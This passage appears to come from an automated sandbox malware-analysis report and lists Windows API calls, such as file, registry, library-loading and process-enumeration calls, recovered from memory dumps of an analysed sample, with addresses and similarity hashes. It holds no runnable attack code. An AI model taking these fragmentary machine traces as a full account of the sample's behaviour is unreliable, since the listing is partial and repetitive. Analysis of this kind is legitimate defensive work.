                                                                                • API String ID: 1161345128-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000001.650151435.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000001.650532404.0000000000459000.00000040.00020000.sdmp
                                                                                • Associated: 00000003.00000001.650563628.000000000045D000.00000040.00020000.sdmp
                                                                                • Associated: 00000003.00000001.650585154.0000000000473000.00000040.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Handle
                                                                                • String ID:
                                                                                • API String ID: 2519475695-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: _wcsicmp
                                                                                • String ID: /stext
                                                                                • API String ID: 2081463915-3817206916
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                • FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
                                                                                • String ID:
                                                                                • API String ID: 159017214-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000001.650151435.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000001.650532404.0000000000459000.00000040.00020000.sdmp
                                                                                • Associated: 00000003.00000001.650563628.000000000045D000.00000040.00020000.sdmp
                                                                                • Associated: 00000003.00000001.650585154.0000000000473000.00000040.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: malloc
                                                                                • String ID: failed to allocate %u bytes of memory
                                                                                • API String ID: 2803490479-1168259600
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: malloc
                                                                                • String ID: failed to allocate %u bytes of memory
                                                                                • API String ID: 2803490479-1168259600
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: ??3@
                                                                                • String ID:
                                                                                • API String ID: 613200358-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: ??3@
                                                                                • String ID:
                                                                                • API String ID: 613200358-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: memcmpmemset
                                                                                • String ID:
                                                                                • API String ID: 1065087418-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: memset
                                                                                • String ID:
                                                                                • API String ID: 2221118986-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000FFF,00000000,00000000), ref: 0040B348
                                                                                  • Part of subcall function 00415427: Sleep.KERNEL32(0040B35A,?), ref: 00415433
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000001.650151435.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000001.650532404.0000000000459000.00000040.00020000.sdmp
                                                                                • Associated: 00000003.00000001.650563628.000000000045D000.00000040.00020000.sdmp
                                                                                • Associated: 00000003.00000001.650585154.0000000000473000.00000040.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: ByteCharMultiSleepWide
                                                                                • String ID:
                                                                                • API String ID: 1884586056-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                  • Part of subcall function 0040A02C: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                  • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                  • Part of subcall function 0040A02C: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                • String ID:
                                                                                • API String ID: 2154303073-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                • String ID:
                                                                                • API String ID: 3150196962-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                  • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                  • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                  • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                • String ID:
                                                                                • API String ID: 4232544981-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: FreeLibrary
                                                                                • String ID:
                                                                                • API String ID: 3664257935-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: AddressProc$FileModuleName
                                                                                • String ID:
                                                                                • API String ID: 3859505661-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: FileRead
                                                                                • String ID:
                                                                                • API String ID: 2738559852-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,0041056A,00000000,004538EC,00000002,?,00412758,00000000,00000000,?), ref: 0040A325
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: FileWrite
                                                                                • String ID:
                                                                                • API String ID: 3934441357-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: FreeLibrary
                                                                                • String ID:
                                                                                • API String ID: 3664257935-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: ??3@
                                                                                • String ID:
                                                                                • API String ID: 613200358-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: ??3@
                                                                                • String ID:
                                                                                • API String ID: 613200358-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: FreeLibrary
                                                                                • String ID:
                                                                                • API String ID: 3664257935-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: CloseFind
                                                                                • String ID:
                                                                                • API String ID: 1863332320-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: Open
                                                                                • String ID:
                                                                                • API String ID: 71445658-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000001.650151435.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000001.650532404.0000000000459000.00000040.00020000.sdmp
                                                                                • Associated: 00000003.00000001.650563628.000000000045D000.00000040.00020000.sdmp
                                                                                • Associated: 00000003.00000001.650585154.0000000000473000.00000040.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: ??3@
                                                                                • String ID:
                                                                                • API String ID: 613200358-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: ??3@
                                                                                • String ID:
                                                                                • API String ID: 613200358-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000001.650151435.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000001.650532404.0000000000459000.00000040.00020000.sdmp
                                                                                • Associated: 00000003.00000001.650563628.000000000045D000.00000040.00020000.sdmp
                                                                                • Associated: 00000003.00000001.650585154.0000000000473000.00000040.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: memset
                                                                                • String ID:
                                                                                • API String ID: 2221118986-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: ??2@??3@
                                                                                • String ID:
                                                                                • API String ID: 1936579350-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Non-executed Functions